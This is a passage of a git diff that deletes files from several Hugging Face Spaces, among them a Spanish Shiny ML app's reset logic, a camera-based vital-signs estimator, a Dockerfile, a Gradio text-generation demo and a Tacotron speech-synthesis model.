limpia con los datos originales - for columnName in original_df.columns: - clean_df[columnName] = original_df[columnName] - - # VACIAR TODAS LAS DATAFRAMES DE IMPORTANCIA DE VARIABLES - def empty_all_feature_importance_df(): - # Vaciar la tabla de importancia de variables si es necesario - empty_dec_tree_feature_importance_df() - empty_ran_forest_feature_importance_df() - empty_log_reg_feature_importance_df() - - # Para árbol de decisión - def empty_dec_tree_feature_importance_df(): - if len(dec_tree_feat_imp_df) > 0: - dec_tree_feat_imp_df.drop(["Característica", "Valor"], axis = 1, inplace=True) - dec_tree_feat_imp_df.drop(dec_tree_feat_imp_df.index, inplace=True) - - # Para bosque aleatorio - def empty_ran_forest_feature_importance_df(): - if len(ran_forest_feat_imp_df) > 0: - ran_forest_feat_imp_df.drop(["Característica", "Valor"], axis = 1, inplace=True) - ran_forest_feat_imp_df.drop(ran_forest_feat_imp_df.index, inplace=True) - - # Para regresión logística - def empty_log_reg_feature_importance_df(): - if len(log_reg_feat_imp_df) > 0: - log_reg_feat_imp_df.drop(["Característica", "Valor"], axis = 1, inplace=True) - log_reg_feat_imp_df.drop(log_reg_feat_imp_df.index, inplace=True) - - # ACTUALIZAR SELECTORES Y CHECKBOXES NECESARIOS - def update_all_selectors(): - update_dropIdSelector() - update_decTree_checkbox_group() - update_ranForest_checkbox_group() - update_logReg_checkbox_group() - - # RESET TODAS LAS VARIABLES DE RESULTADOS - def reset_all_result_values(): - #Decision Tree: - reset_dec_tree_result_values() - #Random Forest: - reset_ran_forest_result_values() - #Logistic regression: - reset_log_reg_result_values() - - # RESET TODAS LAS VARIABLES DE RESULTADOS ÁRBOL DECISION - def reset_dec_tree_result_values(): - accuracy_decTree.set(-1) - recall_decTree.set(-1) - precision_decTree.set(-1) - f1_decTree.set(-1) - - accuracy_decTree_test.set(-1) - recall_decTree_test.set(-1) - precision_decTree_test.set(-1) 
- f1_decTree_test.set(-1) - - # RESET TODAS LAS VARIABLES DE RESULTADOS BOSQUE ALEATORIO - def reset_ran_forest_result_values(): - accuracy_ranForest.set(-1) - recall_ranForest.set(-1) - precision_ranForest.set(-1) - f1_ranForest.set(-1) - - accuracy_ranForest_test.set(-1) - recall_ranForest_test.set(-1) - precision_ranForest_test.set(-1) - f1_ranForest_test.set(-1) - - # RESET TODAS LAS VARIABLES DE RESULTADOS REGRESIÓN LOGÍSTICA - def reset_log_reg_result_values(): - accuracy_logReg.set(-1) - recall_logReg.set(-1) - precision_logReg.set(-1) - f1_logReg.set(-1) - - accuracy_logReg_test.set(-1) - recall_logReg_test.set(-1) - precision_logReg_test.set(-1) - f1_logReg_test.set(-1) - - # CERRAR LAS PARTES DE UI NECESARIAS AL HACER RESET - def close_every_ui_after_reset(): - ui.remove_ui("#correlation-plot") - ui.update_switch("view_correlation", value=False) - - ui.remove_ui("#var-imp-dec-tree-plot") - ui.update_switch("view_variable_importance_dec_tree", value=False) - - ui.remove_ui("#dec-tree-conf-mat-train") - ui.remove_ui("#dec-tree-conf-mat-test") - ui.update_switch("conf_mat_dec_tree_switch", value=False) - - ui.remove_ui("#dec-tree-view-img") - ui.update_switch("view_tree_dec_tree_switch", value=False) - - ui.remove_ui("#var-imp-ran-forest-plot") - ui.update_switch("view_variable_importance_ran_forest", value=False) - - ui.remove_ui("#ran-forest-conf-mat-train") - ui.remove_ui("#ran-forest-conf-mat-test") - ui.update_switch("conf_mat_ran_forest_switch", value=False) - - ui.remove_ui("#ran-forest-view-img") - ui.remove_ui("#ran-forest-view-img-foot") - ui.update_switch("view_tree_ran_forest_switch", value=False) - - ui.remove_ui("#var-imp-log-reg-plot") - ui.update_switch("view_variable_importance_log_reg", value=False) - - ui.remove_ui("#log-reg-conf-mat-train") - ui.remove_ui("#log-reg-conf-mat-test") - ui.update_switch("conf_mat_log_reg_switch", value=False) - - # Resetear manualmente el select del número de árbol a mostrar de random forest - ui.update_select("view_tree_ran_forest_number", choices=empty_column_dict), - - def resetAndDeleteEverything(): - delete_imgs_from_disk() - reset_dataframes_if_changed() - - # RESETEAR DATAFRAMES NECESARIAS (POR SI SE HA REALIZADO UNA RECARGA DE LA PÁGINA) - def reset_dataframes_if_changed(): - if len(original_df.columns) != len(clean_df.columns) or ( clean_df["diagnosis"][0] == 1 or clean_df["diagnosis"][0] == 0 ): - reset_clean_df() - - # Vaciar las tablas de importancia de variables si es necesario - empty_all_feature_importance_df() - - # BORRAR LAS IMÁGENES GUARDADAS EN DISCO (USADO AL CERRAR SESIÓN) - def delete_imgs_from_disk(): - img_dec_tree_path = str(decTree_image_folder) + "\\" + str(session.id) + "_dec_tree.jpg" - Path(img_dec_tree_path).unlink(missing_ok=True) - - img_custom_dec_tree_path = str(decTree_image_folder) + "\\" + str(session.id) + "custom_dec_tree.jpg" - Path(img_custom_dec_tree_path).unlink(missing_ok=True) - - for index in range(5): - img_ran_forest_path = str(ranForest_image_folder) + "\\" + str(session.id) + '_ran_forest' + str(index) + '.jpg' - Path(img_ran_forest_path).unlink(missing_ok=True) - - img_custom_ran_forest_path = str(ranForest_image_folder) + "\\" + str(session.id) + 'custom_ran_forest' + str(index) + '.jpg' - Path(img_custom_ran_forest_path).unlink(missing_ok=True) - - return - - # LLAMAR A LA FUNCIÓN QUE RESETEE Y LIMPIE LOS DATOS DEL DISCO AL CERRAR UNA SESIÓN - session.on_ended(resetAndDeleteEverything) - \ No newline at end of file diff --git 
a/spaces/Juliojuse/human_health_gradio/code/physiological_indicators.py b/spaces/Juliojuse/human_health_gradio/code/physiological_indicators.py
deleted file mode 100644
index 28750a03fdd28dec022c79c254f3a719893fb3f4..0000000000000000000000000000000000000000
--- a/spaces/Juliojuse/human_health_gradio/code/physiological_indicators.py
+++ /dev/null
@@ -1,106 +0,0 @@
-from utils_sig import *
-import joblib
-import numpy as np
-from lightgbm import LGBMRegressor
-
-import heartpy as hp
-import scipy.signal as sig
-
-class PhysiologicalIndicators:
-    def __init__(self):
-        self.heart_rate = 0
-        self.respiratory_rate = 0
-        self.heart_rate_variability = 0
-        self.SpO2 = 0
-        self.blood_pressure = 0
-
-    def calculate_heart_rate(self, ippg_data, fps):
-        # Code to compute the heart rate
-        print("HR processing")
-        self.heart_rate, self.respiratory_rate = hr_fft_2(ippg_data, fps)
-        # ippg = butter_bandpass(ippg_data, lowcut=0.6, highcut=4, fs=fps)
-        # self.heart_rate, psd_y, psd_x = hr_fft(ippg, fs=fps)
-        print("HR done")
-        return self.heart_rate, self.respiratory_rate
-
-    def calculate_heart_rate_variability(self, ippg_data, fps):
-        # Code to compute heart rate variability
-        # TODO: implement the heart rate variability calculation
-        self.heart_rate_variability = calculate_hrv(ippg_data, fps)
-        return self.heart_rate_variability
-
-    def calculate_SpO2(self, ROI_list, ROI2_list):
-        # Code to compute blood oxygen saturation (SpO2)
-        # TODO: implement the SpO2 calculation
-        ROI1_SpO2 = RGB_SpO2(ROI_list)
-        ROI2_SpO2 = RGB_SpO2(ROI2_list)
-        self.SpO2 = (ROI1_SpO2 + ROI2_SpO2) / 2
-        return self.SpO2
-
-    def calculate_blood_pressure(self, ippg_data):
-        # Code to compute blood pressure
-        ippg_data = np.array(ippg_data).reshape(len(ippg_data),1)
-
-        bp_pred = []
-        model_list = joblib.load( './code/model_weight/lgb_model_ppg2bp.pkl')
-        for model in model_list:
-            result = model.predict(ippg_data)
-            bp_pred.append(result+10)
-        bp_list = np.mean(bp_pred, axis=0)
-        return bp_list,np.max(bp_list),np.min(bp_list)-15
-
-    def calculate_HR(self, ROI_list, ROI2_list):
-        # Code to compute HR
-        ROI1_HR = RGB_HR(ROI_list)
-        ROI2_HR = RGB_HR(ROI2_list)
-        print("ROI1_HR",ROI1_HR,"ROI2_HR",ROI2_HR)
-        HR = (ROI1_HR + ROI2_HR) / 2
-        return HR
-
-
-    # Define a function to compute the heart rate from a PPG signal
-    def calculate_heart_rate_2(self,ppg_signal, sampling_rate):
-        # Band-pass filter the signal with a Butterworth filter to remove noise
-        nyquist_frequency = sampling_rate / 2.0
-        low_cutoff_frequency = 0.5
-        high_cutoff_frequency = 5.0
-        filter_order = 2
-
-        b, a = sig.butter(filter_order, [low_cutoff_frequency/nyquist_frequency, high_cutoff_frequency/nyquist_frequency], btype='band')
-        filtered_signal = sig.filtfilt(b, a, ppg_signal)
-
-        # Compute the heart rate
-        window_length = int(sampling_rate * 0.75)
-        step_size = int(sampling_rate * 0.1)
-        threshold = 0.4
-
-        # Use peak detection to find the pulse peaks
-        peak_indexes, _ = sig.find_peaks(filtered_signal, distance=10)
-        print("============================",peak_indexes,sampling_rate)
-        # Compute the inter-peak intervals and derive the heart rate
-        # time_intervals = np.diff(peak_indexes) / float(sampling_rate)
-        time_intervals = np.diff(peak_indexes) * 0.045
-        heart_rate = 60.0 / np.mean(time_intervals)
-
-        return heart_rate
-
-    # Define a function to compute the heart rate from an rPPG signal
-    def calculate_heart_rate_3(self,signal):
-        wd, m = hp.process(signal, sample_rate = 100.0)
-
-        return wd, m
-
-
-
-    # def calculate_SPO2(self, ippg_chanel_data):
-    #     # Code to compute SpO2
-    #     ippg_chanel_data = np.array(ippg_chanel_data).reshape(len(ippg_chanel_data),6)
-
-    #     SPO2_pred = []
-    #     model_list = joblib.load( './model_weight/lgb_model_threechanel2spo2.pkl')
-    #     for model in model_list:
-    #         result = model.predict(ippg_chanel_data)
-    #         SPO2_pred.append(result)
-    #     SPO2_list = np.mean(SPO2_pred, axis=0)
-    #     return SPO2_list
-
diff --git a/spaces/JunghunleePhD/testfordocker/Dockerfile 
b/spaces/JunghunleePhD/testfordocker/Dockerfile deleted file mode 100644 index f40da5ecc4dbec04dfc90421bee92e022549f438..0000000000000000000000000000000000000000 --- a/spaces/JunghunleePhD/testfordocker/Dockerfile +++ /dev/null @@ -1,11 +0,0 @@ -FROM python:3.9 - -WORKDIR /app - -COPY ./app/requirements.txt /app/requirements.txt - -RUN pip install --no-cache-dir --upgrade -r /app/requirements.txt - -COPY . . - -CMD ["uvicorn", "app.main:app", "--reload", "--host", "0.0.0.0", "--port", "7860"] diff --git a/spaces/KAIST-Geometric-AI-Lab/salad-demo/salad/spaghetti/constants.py b/spaces/KAIST-Geometric-AI-Lab/salad-demo/salad/spaghetti/constants.py deleted file mode 100644 index 06f64c4c1846c6e185a0524d07c857544f868dde..0000000000000000000000000000000000000000 --- a/spaces/KAIST-Geometric-AI-Lab/salad-demo/salad/spaghetti/constants.py +++ /dev/null @@ -1,22 +0,0 @@ -import os -from pathlib import Path -import sys -from salad.utils.paths import SPAGHETTI_DIR - -IS_WINDOWS = sys.platform == 'win32' -get_trace = getattr(sys, 'gettrace', None) -DEBUG = get_trace is not None and get_trace() is not None -EPSILON = 1e-4 -DIM = 3 -# PROJECT_ROOT = str(Path(os.path.realpath(__file__)).parents[0]) -PROJECT_ROOT = str(SPAGHETTI_DIR) -DATA_ROOT = f'{PROJECT_ROOT}/assets/' -CHECKPOINTS_ROOT = f'{DATA_ROOT}checkpoints/' -CACHE_ROOT = f'{DATA_ROOT}cache/' -UI_OUT = f'{DATA_ROOT}ui_export/' -UI_RESOURCES = f'{DATA_ROOT}/ui_resources/' -Shapenet_WT = f'{DATA_ROOT}/ShapeNetCore_wt/' -Shapenet = f'{DATA_ROOT}/ShapeNetCore.v2/' -MAX_VS = 100000 -MAX_GAUSIANS = 32 - diff --git a/spaces/Kangarroar/ApplioRVC-Inference/Applio-RVC-Fork/utils/i18n.py b/spaces/Kangarroar/ApplioRVC-Inference/Applio-RVC-Fork/utils/i18n.py deleted file mode 100644 index 8e75d2bc26ff86ab1716b8d7f239ad9f5cc1e32d..0000000000000000000000000000000000000000 --- a/spaces/Kangarroar/ApplioRVC-Inference/Applio-RVC-Fork/utils/i18n.py +++ /dev/null @@ -1,28 +0,0 @@ -import locale -import json -import os - - -def load_language_list(language): - with open(f"./i18n/{language}.json", "r", encoding="utf-8") as f: - language_list = json.load(f) - return language_list - - -class I18nAuto: - def __init__(self, language=None): - if language in ["Auto", None]: - language = "es_ES" - if not os.path.exists(f"./i18n/{language}.json"): - language = "es_ES" - language = "es_ES" - self.language = language - # print("Use Language:", language) - self.language_map = load_language_list(language) - - def __call__(self, key): - return self.language_map.get(key, key) - - def print(self): - # print("Use Language:", self.language) - print("") diff --git a/spaces/Katyyy/text_generator/app.py b/spaces/Katyyy/text_generator/app.py deleted file mode 100644 index 96d20ef5b60cd0ea1d6917014dc18215fce042e3..0000000000000000000000000000000000000000 --- a/spaces/Katyyy/text_generator/app.py +++ /dev/null @@ -1,12 +0,0 @@ -import gradio as gr -from gradio.mix import Parallel - -myfirstvariable="My First Text Generator" -mylovelysecondvariable="Input text and submit." 
- -model1=gr.Interface.load("huggingface/gpt2") -model2=gr.Interface.load("huggingface/EleutherAI/gpt-neo-1.3B") -model3=gr.Interface.load("huggingface/bigscience/bloom-560m") - - -gr.Parallel(model1, model2, model3, title=myfirstvariable, description=mylovelysecondvariable).launch() \ No newline at end of file diff --git a/spaces/Kevin676/Clone-Your-Voice/synthesizer/models/tacotron.py b/spaces/Kevin676/Clone-Your-Voice/synthesizer/models/tacotron.py deleted file mode 100644 index 769f7f98b79100ff587af3609010dd55e3b2a146..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/Clone-Your-Voice/synthesizer/models/tacotron.py +++ /dev/null @@ -1,519 +0,0 @@ -import os -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from pathlib import Path -from typing import Union - - -class HighwayNetwork(nn.Module): - def __init__(self, size): - super().__init__() - self.W1 = nn.Linear(size, size) - self.W2 = nn.Linear(size, size) - self.W1.bias.data.fill_(0.) - - def forward(self, x): - x1 = self.W1(x) - x2 = self.W2(x) - g = torch.sigmoid(x2) - y = g * F.relu(x1) + (1. - g) * x - return y - - -class Encoder(nn.Module): - def __init__(self, embed_dims, num_chars, encoder_dims, K, num_highways, dropout): - super().__init__() - prenet_dims = (encoder_dims, encoder_dims) - cbhg_channels = encoder_dims - self.embedding = nn.Embedding(num_chars, embed_dims) - self.pre_net = PreNet(embed_dims, fc1_dims=prenet_dims[0], fc2_dims=prenet_dims[1], - dropout=dropout) - self.cbhg = CBHG(K=K, in_channels=cbhg_channels, channels=cbhg_channels, - proj_channels=[cbhg_channels, cbhg_channels], - num_highways=num_highways) - - def forward(self, x, speaker_embedding=None): - x = self.embedding(x) - x = self.pre_net(x) - x.transpose_(1, 2) - x = self.cbhg(x) - if speaker_embedding is not None: - x = self.add_speaker_embedding(x, speaker_embedding) - return x - - def add_speaker_embedding(self, x, speaker_embedding): - # SV2TTS - # The input x is the encoder output and is a 3D tensor with size (batch_size, num_chars, tts_embed_dims) - # When training, speaker_embedding is also a 2D tensor with size (batch_size, speaker_embedding_size) - # (for inference, speaker_embedding is a 1D tensor with size (speaker_embedding_size)) - # This concats the speaker embedding for each char in the encoder output - - # Save the dimensions as human-readable names - batch_size = x.size()[0] - num_chars = x.size()[1] - - if speaker_embedding.dim() == 1: - idx = 0 - else: - idx = 1 - - # Start by making a copy of each speaker embedding to match the input text length - # The output of this has size (batch_size, num_chars * tts_embed_dims) - speaker_embedding_size = speaker_embedding.size()[idx] - e = speaker_embedding.repeat_interleave(num_chars, dim=idx) - - # Reshape it and transpose - e = e.reshape(batch_size, speaker_embedding_size, num_chars) - e = e.transpose(1, 2) - - # Concatenate the tiled speaker embedding with the encoder output - x = torch.cat((x, e), 2) - return x - - -class BatchNormConv(nn.Module): - def __init__(self, in_channels, out_channels, kernel, relu=True): - super().__init__() - self.conv = nn.Conv1d(in_channels, out_channels, kernel, stride=1, padding=kernel // 2, bias=False) - self.bnorm = nn.BatchNorm1d(out_channels) - self.relu = relu - - def forward(self, x): - x = self.conv(x) - x = F.relu(x) if self.relu is True else x - return self.bnorm(x) - - -class CBHG(nn.Module): - def __init__(self, K, in_channels, channels, proj_channels, num_highways): - super().__init__() - 
- # List of all rnns to call `flatten_parameters()` on - self._to_flatten = [] - - self.bank_kernels = [i for i in range(1, K + 1)] - self.conv1d_bank = nn.ModuleList() - for k in self.bank_kernels: - conv = BatchNormConv(in_channels, channels, k) - self.conv1d_bank.append(conv) - - self.maxpool = nn.MaxPool1d(kernel_size=2, stride=1, padding=1) - - self.conv_project1 = BatchNormConv(len(self.bank_kernels) * channels, proj_channels[0], 3) - self.conv_project2 = BatchNormConv(proj_channels[0], proj_channels[1], 3, relu=False) - - # Fix the highway input if necessary - if proj_channels[-1] != channels: - self.highway_mismatch = True - self.pre_highway = nn.Linear(proj_channels[-1], channels, bias=False) - else: - self.highway_mismatch = False - - self.highways = nn.ModuleList() - for i in range(num_highways): - hn = HighwayNetwork(channels) - self.highways.append(hn) - - self.rnn = nn.GRU(channels, channels // 2, batch_first=True, bidirectional=True) - self._to_flatten.append(self.rnn) - - # Avoid fragmentation of RNN parameters and associated warning - self._flatten_parameters() - - def forward(self, x): - # Although we `_flatten_parameters()` on init, when using DataParallel - # the model gets replicated, making it no longer guaranteed that the - # weights are contiguous in GPU memory. Hence, we must call it again - self._flatten_parameters() - - # Save these for later - residual = x - seq_len = x.size(-1) - conv_bank = [] - - # Convolution Bank - for conv in self.conv1d_bank: - c = conv(x) # Convolution - conv_bank.append(c[:, :, :seq_len]) - - # Stack along the channel axis - conv_bank = torch.cat(conv_bank, dim=1) - - # dump the last padding to fit residual - x = self.maxpool(conv_bank)[:, :, :seq_len] - - # Conv1d projections - x = self.conv_project1(x) - x = self.conv_project2(x) - - # Residual Connect - x = x + residual - - # Through the highways - x = x.transpose(1, 2) - if self.highway_mismatch is True: - x = self.pre_highway(x) - for h in self.highways: x = h(x) - - # And then the RNN - x, _ = self.rnn(x) - return x - - def _flatten_parameters(self): - """Calls `flatten_parameters` on all the rnns used by the WaveRNN. 
Used - to improve efficiency and avoid PyTorch yelling at us.""" - [m.flatten_parameters() for m in self._to_flatten] - -class PreNet(nn.Module): - def __init__(self, in_dims, fc1_dims=256, fc2_dims=128, dropout=0.5): - super().__init__() - self.fc1 = nn.Linear(in_dims, fc1_dims) - self.fc2 = nn.Linear(fc1_dims, fc2_dims) - self.p = dropout - - def forward(self, x): - x = self.fc1(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - x = self.fc2(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - return x - - -class Attention(nn.Module): - def __init__(self, attn_dims): - super().__init__() - self.W = nn.Linear(attn_dims, attn_dims, bias=False) - self.v = nn.Linear(attn_dims, 1, bias=False) - - def forward(self, encoder_seq_proj, query, t): - - # print(encoder_seq_proj.shape) - # Transform the query vector - query_proj = self.W(query).unsqueeze(1) - - # Compute the scores - u = self.v(torch.tanh(encoder_seq_proj + query_proj)) - scores = F.softmax(u, dim=1) - - return scores.transpose(1, 2) - - -class LSA(nn.Module): - def __init__(self, attn_dim, kernel_size=31, filters=32): - super().__init__() - self.conv = nn.Conv1d(1, filters, padding=(kernel_size - 1) // 2, kernel_size=kernel_size, bias=True) - self.L = nn.Linear(filters, attn_dim, bias=False) - self.W = nn.Linear(attn_dim, attn_dim, bias=True) # Include the attention bias in this term - self.v = nn.Linear(attn_dim, 1, bias=False) - self.cumulative = None - self.attention = None - - def init_attention(self, encoder_seq_proj): - device = next(self.parameters()).device # use same device as parameters - b, t, c = encoder_seq_proj.size() - self.cumulative = torch.zeros(b, t, device=device) - self.attention = torch.zeros(b, t, device=device) - - def forward(self, encoder_seq_proj, query, t, chars): - - if t == 0: self.init_attention(encoder_seq_proj) - - processed_query = self.W(query).unsqueeze(1) - - location = self.cumulative.unsqueeze(1) - processed_loc = self.L(self.conv(location).transpose(1, 2)) - - u = self.v(torch.tanh(processed_query + encoder_seq_proj + processed_loc)) - u = u.squeeze(-1) - - # Mask zero padding chars - u = u * (chars != 0).float() - - # Smooth Attention - # scores = torch.sigmoid(u) / torch.sigmoid(u).sum(dim=1, keepdim=True) - scores = F.softmax(u, dim=1) - self.attention = scores - self.cumulative = self.cumulative + self.attention - - return scores.unsqueeze(-1).transpose(1, 2) - - -class Decoder(nn.Module): - # Class variable because its value doesn't change between classes - # yet ought to be scoped by class because its a property of a Decoder - max_r = 20 - def __init__(self, n_mels, encoder_dims, decoder_dims, lstm_dims, - dropout, speaker_embedding_size): - super().__init__() - self.register_buffer("r", torch.tensor(1, dtype=torch.int)) - self.n_mels = n_mels - prenet_dims = (decoder_dims * 2, decoder_dims * 2) - self.prenet = PreNet(n_mels, fc1_dims=prenet_dims[0], fc2_dims=prenet_dims[1], - dropout=dropout) - self.attn_net = LSA(decoder_dims) - self.attn_rnn = nn.GRUCell(encoder_dims + prenet_dims[1] + speaker_embedding_size, decoder_dims) - self.rnn_input = nn.Linear(encoder_dims + decoder_dims + speaker_embedding_size, lstm_dims) - self.res_rnn1 = nn.LSTMCell(lstm_dims, lstm_dims) - self.res_rnn2 = nn.LSTMCell(lstm_dims, lstm_dims) - self.mel_proj = nn.Linear(lstm_dims, n_mels * self.max_r, bias=False) - self.stop_proj = nn.Linear(encoder_dims + speaker_embedding_size + lstm_dims, 1) - - def zoneout(self, prev, current, p=0.1): - device = next(self.parameters()).device # Use 
same device as parameters - mask = torch.zeros(prev.size(), device=device).bernoulli_(p) - return prev * mask + current * (1 - mask) - - def forward(self, encoder_seq, encoder_seq_proj, prenet_in, - hidden_states, cell_states, context_vec, t, chars): - - # Need this for reshaping mels - batch_size = encoder_seq.size(0) - - # Unpack the hidden and cell states - attn_hidden, rnn1_hidden, rnn2_hidden = hidden_states - rnn1_cell, rnn2_cell = cell_states - - # PreNet for the Attention RNN - prenet_out = self.prenet(prenet_in) - - # Compute the Attention RNN hidden state - attn_rnn_in = torch.cat([context_vec, prenet_out], dim=-1) - attn_hidden = self.attn_rnn(attn_rnn_in.squeeze(1), attn_hidden) - - # Compute the attention scores - scores = self.attn_net(encoder_seq_proj, attn_hidden, t, chars) - - # Dot product to create the context vector - context_vec = scores @ encoder_seq - context_vec = context_vec.squeeze(1) - - # Concat Attention RNN output w. Context Vector & project - x = torch.cat([context_vec, attn_hidden], dim=1) - x = self.rnn_input(x) - - # Compute first Residual RNN - rnn1_hidden_next, rnn1_cell = self.res_rnn1(x, (rnn1_hidden, rnn1_cell)) - if self.training: - rnn1_hidden = self.zoneout(rnn1_hidden, rnn1_hidden_next) - else: - rnn1_hidden = rnn1_hidden_next - x = x + rnn1_hidden - - # Compute second Residual RNN - rnn2_hidden_next, rnn2_cell = self.res_rnn2(x, (rnn2_hidden, rnn2_cell)) - if self.training: - rnn2_hidden = self.zoneout(rnn2_hidden, rnn2_hidden_next) - else: - rnn2_hidden = rnn2_hidden_next - x = x + rnn2_hidden - - # Project Mels - mels = self.mel_proj(x) - mels = mels.view(batch_size, self.n_mels, self.max_r)[:, :, :self.r] - hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) - cell_states = (rnn1_cell, rnn2_cell) - - # Stop token prediction - s = torch.cat((x, context_vec), dim=1) - s = self.stop_proj(s) - stop_tokens = torch.sigmoid(s) - - return mels, scores, hidden_states, cell_states, context_vec, stop_tokens - - -class Tacotron(nn.Module): - def __init__(self, embed_dims, num_chars, encoder_dims, decoder_dims, n_mels, - fft_bins, postnet_dims, encoder_K, lstm_dims, postnet_K, num_highways, - dropout, stop_threshold, speaker_embedding_size): - super().__init__() - self.n_mels = n_mels - self.lstm_dims = lstm_dims - self.encoder_dims = encoder_dims - self.decoder_dims = decoder_dims - self.speaker_embedding_size = speaker_embedding_size - self.encoder = Encoder(embed_dims, num_chars, encoder_dims, - encoder_K, num_highways, dropout) - self.encoder_proj = nn.Linear(encoder_dims + speaker_embedding_size, decoder_dims, bias=False) - self.decoder = Decoder(n_mels, encoder_dims, decoder_dims, lstm_dims, - dropout, speaker_embedding_size) - self.postnet = CBHG(postnet_K, n_mels, postnet_dims, - [postnet_dims, fft_bins], num_highways) - self.post_proj = nn.Linear(postnet_dims, fft_bins, bias=False) - - self.init_model() - self.num_params() - - self.register_buffer("step", torch.zeros(1, dtype=torch.long)) - self.register_buffer("stop_threshold", torch.tensor(stop_threshold, dtype=torch.float32)) - - @property - def r(self): - return self.decoder.r.item() - - @r.setter - def r(self, value): - self.decoder.r = self.decoder.r.new_tensor(value, requires_grad=False) - - def forward(self, x, m, speaker_embedding): - device = next(self.parameters()).device # use same device as parameters - - self.step += 1 - batch_size, _, steps = m.size() - - # Initialise all hidden states and pack into tuple - attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) 
- rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) - - # Initialise all lstm cell states and pack into tuple - rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - cell_states = (rnn1_cell, rnn2_cell) - - # Frame for start of decoder loop - go_frame = torch.zeros(batch_size, self.n_mels, device=device) - - # Need an initial context vector - context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) - - # SV2TTS: Run the encoder with the speaker embedding - # The projection avoids unnecessary matmuls in the decoder loop - encoder_seq = self.encoder(x, speaker_embedding) - encoder_seq_proj = self.encoder_proj(encoder_seq) - - # Need a couple of lists for outputs - mel_outputs, attn_scores, stop_outputs = [], [], [] - - # Run the decoder loop - for t in range(0, steps, self.r): - prenet_in = m[:, :, t - 1] if t > 0 else go_frame - mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ - self.decoder(encoder_seq, encoder_seq_proj, prenet_in, - hidden_states, cell_states, context_vec, t, x) - mel_outputs.append(mel_frames) - attn_scores.append(scores) - stop_outputs.extend([stop_tokens] * self.r) - - # Concat the mel outputs into sequence - mel_outputs = torch.cat(mel_outputs, dim=2) - - # Post-Process for Linear Spectrograms - postnet_out = self.postnet(mel_outputs) - linear = self.post_proj(postnet_out) - linear = linear.transpose(1, 2) - - # For easy visualisation - attn_scores = torch.cat(attn_scores, 1) - # attn_scores = attn_scores.cpu().data.numpy() - stop_outputs = torch.cat(stop_outputs, 1) - - return mel_outputs, linear, attn_scores, stop_outputs - - def generate(self, x, speaker_embedding=None, steps=2000): - self.eval() - device = next(self.parameters()).device # use same device as parameters - - batch_size, _ = x.size() - - # Need to initialise all hidden states and pack into tuple for tidyness - attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) - rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) - - # Need to initialise all lstm cell states and pack into tuple for tidyness - rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - cell_states = (rnn1_cell, rnn2_cell) - - # Need a Frame for start of decoder loop - go_frame = torch.zeros(batch_size, self.n_mels, device=device) - - # Need an initial context vector - context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) - - # SV2TTS: Run the encoder with the speaker embedding - # The projection avoids unnecessary matmuls in the decoder loop - encoder_seq = self.encoder(x, speaker_embedding) - encoder_seq_proj = self.encoder_proj(encoder_seq) - - # Need a couple of lists for outputs - mel_outputs, attn_scores, stop_outputs = [], [], [] - - # Run the decoder loop - for t in range(0, steps, self.r): - prenet_in = mel_outputs[-1][:, :, -1] if t > 0 else go_frame - mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ - self.decoder(encoder_seq, encoder_seq_proj, prenet_in, - hidden_states, cell_states, context_vec, t, x) - 
mel_outputs.append(mel_frames) - attn_scores.append(scores) - stop_outputs.extend([stop_tokens] * self.r) - # Stop the loop when all stop tokens in batch exceed threshold - if (stop_tokens > 0.5).all() and t > 10: break - - # Concat the mel outputs into sequence - mel_outputs = torch.cat(mel_outputs, dim=2) - - # Post-Process for Linear Spectrograms - postnet_out = self.postnet(mel_outputs) - linear = self.post_proj(postnet_out) - - - linear = linear.transpose(1, 2) - - # For easy visualisation - attn_scores = torch.cat(attn_scores, 1) - stop_outputs = torch.cat(stop_outputs, 1) - - self.train() - - return mel_outputs, linear, attn_scores - - def init_model(self): - for p in self.parameters(): - if p.dim() > 1: nn.init.xavier_uniform_(p) - - def get_step(self): - return self.step.data.item() - - def reset_step(self): - # assignment to parameters or buffers is overloaded, updates internal dict entry - self.step = self.step.data.new_tensor(1) - - def log(self, path, msg): - with open(path, "a") as f: - print(msg, file=f) - - def load(self, path, optimizer=None): - # Use device of model params as location for loaded state - device = next(self.parameters()).device - checkpoint = torch.load(str(path), map_location=device) - self.load_state_dict(checkpoint["model_state"]) - - if "optimizer_state" in checkpoint and optimizer is not None: - optimizer.load_state_dict(checkpoint["optimizer_state"]) - - def save(self, path, optimizer=None): - if optimizer is not None: - torch.save({ - "model_state": self.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, str(path)) - else: - torch.save({ - "model_state": self.state_dict(), - }, str(path)) - - - def num_params(self, print_out=True): - parameters = filter(lambda p: p.requires_grad, self.parameters()) - parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 - if print_out: - print("Trainable Parameters: %.3fM" % parameters) - return parameters diff --git a/spaces/LanguageBind/LanguageBind/open_clip/zero_shot_metadata.py b/spaces/LanguageBind/LanguageBind/open_clip/zero_shot_metadata.py deleted file mode 100644 index ccb452bbb6e27b71cff1dd27e2bb263259b9363f..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/open_clip/zero_shot_metadata.py +++ /dev/null @@ -1,266 +0,0 @@ - -OPENAI_IMAGENET_TEMPLATES = ( - lambda c: f'a bad photo of a {c}.', - lambda c: f'a photo of many {c}.', - lambda c: f'a sculpture of a {c}.', - lambda c: f'a photo of the hard to see {c}.', 